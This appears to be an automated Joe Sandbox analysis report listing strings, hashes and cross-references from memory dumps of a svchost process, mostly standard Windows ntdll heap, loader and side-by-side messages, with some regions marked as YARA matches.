                                                                                                                                                                              • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                                                                                                                                              • API String ID: 0-3063724069
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                              • API String ID: 0-1700792311
                                                                                                                                                                              Strings
                                                                                                                                                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0302D146
                                                                                                                                                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0302D0CF
                                                                                                                                                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 0302D196
                                                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0302D2C3
                                                                                                                                                                              • @, xrefs: 0302D2AF
                                                                                                                                                                              • @, xrefs: 0302D313
                                                                                                                                                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0302D262
                                                                                                                                                                              • @, xrefs: 0302D0FD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                                                              • API String ID: 0-1356375266
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI$MZER
                                                                                                                                                                              • API String ID: 0-664215390
                                                                                                                                                                              Strings
                                                                                                                                                                              • minkernel\ntdll\sxsisol.cpp, xrefs: 03097713, 030978A4
                                                                                                                                                                              • Internal error check failed, xrefs: 03097718, 030978A9
                                                                                                                                                                              • @, xrefs: 03049EE7
                                                                                                                                                                              • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 030976EE
                                                                                                                                                                              • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03097709
                                                                                                                                                                              • Status != STATUS_NOT_FOUND, xrefs: 0309789A
                                                                                                                                                                              • sxsisol_SearchActCtxForDllName, xrefs: 030976DD
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                                                                                                              • API String ID: 0-761764676
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                              • API String ID: 0-1109411897
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                              • API String ID: 0-523794902
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                              • API String ID: 0-122214566
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-792281065
                                                                                                                                                                              • Opcode ID: 76407946a38a108f5ed9bae41d2270d2bbe2ea17ef18ceb7e08eb9fec7797796
                                                                                                                                                                              • Instruction ID: 0cc449c92972e385953434e43e3ee60f8936641a758e5d9818cfb549888848f2
                                                                                                                                                                              • Opcode Fuzzy Hash: 76407946a38a108f5ed9bae41d2270d2bbe2ea17ef18ceb7e08eb9fec7797796
                                                                                                                                                                              • Instruction Fuzzy Hash: F1915934A03B18ABDB38EF99E844BAEB7A5EF85B14F040528E4106F785D7B59851C7A0
                                                                                                                                                                              Strings
                                                                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 030A21BF
                                                                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 030A2178
                                                                                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 030A219F
                                                                                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 030A2180
                                                                                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 030A2160, 030A219A, 030A21BA
                                                                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 030A2165
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                              • API String ID: 0-861424205
                                                                                                                                                                              • Opcode ID: 87dad0e730b31197bff9bb59942becce483c3fd66a6ee4d40991e25597564772
                                                                                                                                                                              • Instruction ID: 700d3b0ed54de3d77a6aee8cfacbb53363c671a54a1c541db9b5a44fb90ef445
                                                                                                                                                                              • Opcode Fuzzy Hash: 87dad0e730b31197bff9bb59942becce483c3fd66a6ee4d40991e25597564772
                                                                                                                                                                              • Instruction Fuzzy Hash: 4F310936F83215BBE721CA9D9C41F9FB6BCDBA4E50F054869FA046B145D270DA00C7A1
                                                                                                                                                                              Strings
                                                                                                                                                                              • LdrpInitializeImportRedirection, xrefs: 030A8177, 030A81EB
                                                                                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 030A81E5
                                                                                                                                                                              • LdrpInitializeProcess, xrefs: 0306C6C4
                                                                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 030A8181, 030A81F5
                                                                                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 030A8170
                                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0306C6C3
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                              • API String ID: 0-475462383
                                                                                                                                                                              • Opcode ID: b63f68c606b8195e60f5a8953d3988cdb944f0d77b1f4c19134cd8006da2eed7
                                                                                                                                                                              • Instruction ID: a6558abb29b1cdd9abae7e30a532531a06809cde5b4b928ddc4c0c06a59165e8
                                                                                                                                                                              • Opcode Fuzzy Hash: b63f68c606b8195e60f5a8953d3988cdb944f0d77b1f4c19134cd8006da2eed7
                                                                                                                                                                              • Instruction Fuzzy Hash: 6231F375746705AFD224EF68DD46E6BB7E4EFC4B10F040958F885AF295E620EC04CBA2
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$AVRF: Verifier .dlls must not have thread locals$KnownDllPath$L$\KnownDlls32
                                                                                                                                                                              • API String ID: 0-3127649145
                                                                                                                                                                              • Opcode ID: 819d755d27159146512ecaf3645c1143384460363214a9557390a1337d5ff408
                                                                                                                                                                              • Instruction ID: aee7c5e36bd83a5b7399a5c8c9450fe8bd8997841b5e599d65eeb0c07547d5a4
                                                                                                                                                                              • Opcode Fuzzy Hash: 819d755d27159146512ecaf3645c1143384460363214a9557390a1337d5ff408
                                                                                                                                                                              • Instruction Fuzzy Hash: F7323B75A027199BDB61DF25CC88BDAB7F8FF88300F1045EAE509A7650DB71AA84CF50
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                                                                                              • API String ID: 0-3393094623
                                                                                                                                                                              • Opcode ID: 5ae41e70bde88351cf78fb2bbb54081c4e13e2eff91bc01d6e5fa5d7afbbb6d1
                                                                                                                                                                              • Instruction ID: 4bcb6670c40c0dfe7f1bce0ecb400252e2bb96e80197783a4f9f79f2ad721649
                                                                                                                                                                              • Opcode Fuzzy Hash: 5ae41e70bde88351cf78fb2bbb54081c4e13e2eff91bc01d6e5fa5d7afbbb6d1
                                                                                                                                                                              • Instruction Fuzzy Hash: 88025AB150A3418FD760CF64C184BABF7E4BF89704F44897EE9998B250D770DA44CB92
                                                                                                                                                                              Strings
                                                                                                                                                                              • WindowsExcludedProcs, xrefs: 0305522A
                                                                                                                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 03055352
                                                                                                                                                                              • Kernel-MUI-Number-Allowed, xrefs: 03055247
                                                                                                                                                                              • Kernel-MUI-Language-SKU, xrefs: 0305542B
                                                                                                                                                                              • Kernel-MUI-Language-Allowed, xrefs: 0305527B
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                              • API String ID: 0-258546922
                                                                                                                                                                              • Opcode ID: 3043916f603c695d850900ec80c18e82d8cdb97f4e1f3d9862c18b45fa20689c
                                                                                                                                                                              • Instruction ID: d3a670c5fff728fb91cc23997bdaa614f29bb1a971f3ae026e027ebba76aaaa1
                                                                                                                                                                              • Opcode Fuzzy Hash: 3043916f603c695d850900ec80c18e82d8cdb97f4e1f3d9862c18b45fa20689c
                                                                                                                                                                              • Instruction Fuzzy Hash: C7F14B76D02218EFDF15DF98C980AEFBBF9EF49650F15406AE906AB250D7709E01CB90
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                                                                                              • API String ID: 0-2518169356
                                                                                                                                                                              • Opcode ID: ee022b7dc2d1703a2a349af3ba5f631aa10e586a325484430b37c6fcf50184f4
                                                                                                                                                                              • Instruction ID: 78b1ec008ab54ec97fa34f6ed83595b298b8afa8dbd48a85112efcd75a2f0c1d
                                                                                                                                                                              • Opcode Fuzzy Hash: ee022b7dc2d1703a2a349af3ba5f631aa10e586a325484430b37c6fcf50184f4
                                                                                                                                                                              • Instruction Fuzzy Hash: 6591D072D1261A9BCB20CF69C881AFEB7F4EF89310F1945A9E810EB350D735DA01CB90
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-1975516107
                                                                                                                                                                              • Opcode ID: 10be077bb28bf864af4e373f39ff3d44822cbef693a04c77a6a24479305af37b
                                                                                                                                                                              • Instruction ID: 043190974577d1f05ba0be4749278d239ffa483fbf0f3a6e0fd6bcaf2d32a6e9
                                                                                                                                                                              • Opcode Fuzzy Hash: 10be077bb28bf864af4e373f39ff3d44822cbef693a04c77a6a24479305af37b
                                                                                                                                                                              • Instruction Fuzzy Hash: CD510375A02349DFDB24EFA4C4847EEBBF2FF48314F18455AE8016B291D770A991CB90
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                                              • API String ID: 0-3061284088
                                                                                                                                                                              • Opcode ID: 80de5770758086b31e6b76ccae01c1c28ba2f0f830b7d28f11d8b66a5054c50f
                                                                                                                                                                              • Instruction ID: 178e2b33569a7599ccf2c62b92203e0183e62276ddb19d5d6d6fc08a6505e862
                                                                                                                                                                              • Opcode Fuzzy Hash: 80de5770758086b31e6b76ccae01c1c28ba2f0f830b7d28f11d8b66a5054c50f
                                                                                                                                                                              • Instruction Fuzzy Hash: 0501283611B260EEE22AF319940DF9AFBD4DB82E70F18405AE0544F592CEA89880CA20
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                                                                                                                                              Strings
                                                                                                                                                                              • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 03097D03
                                                                                                                                                                              • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 03097D56
                                                                                                                                                                              • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 03097D39
                                                                                                                                                                              • SsHd, xrefs: 0304A885
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                              Strings
                                                                                                                                                                              • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 030955AE
                                                                                                                                                                              • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 030954ED
                                                                                                                                                                              • HEAP: , xrefs: 030954E0, 030955A1
                                                                                                                                                                              • HEAP[%wZ]: , xrefs: 030954D1, 03095592
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                                                                              Strings
                                                                                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 030A21D9, 030A22B1
                                                                                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 030A22B6
                                                                                                                                                                              • .Local, xrefs: 030628D8
                                                                                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 030A21DE
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: gfff$gfff$gfff$gfff
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: *#'$*#'$D{$VUUU
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: gfff$gfff$gfff$gfff
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                                              Strings
                                                                                                                                                                              • HEAP: , xrefs: 03043264
                                                                                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0304327D
                                                                                                                                                                              • HEAP[%wZ]: , xrefs: 03043255
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                              Strings
                                                                                                                                                                              • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03031728
                                                                                                                                                                              • HEAP: , xrefs: 03031596
                                                                                                                                                                              • HEAP[%wZ]: , xrefs: 03031712
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $@
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                              • API String ID: 0-2779062949
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
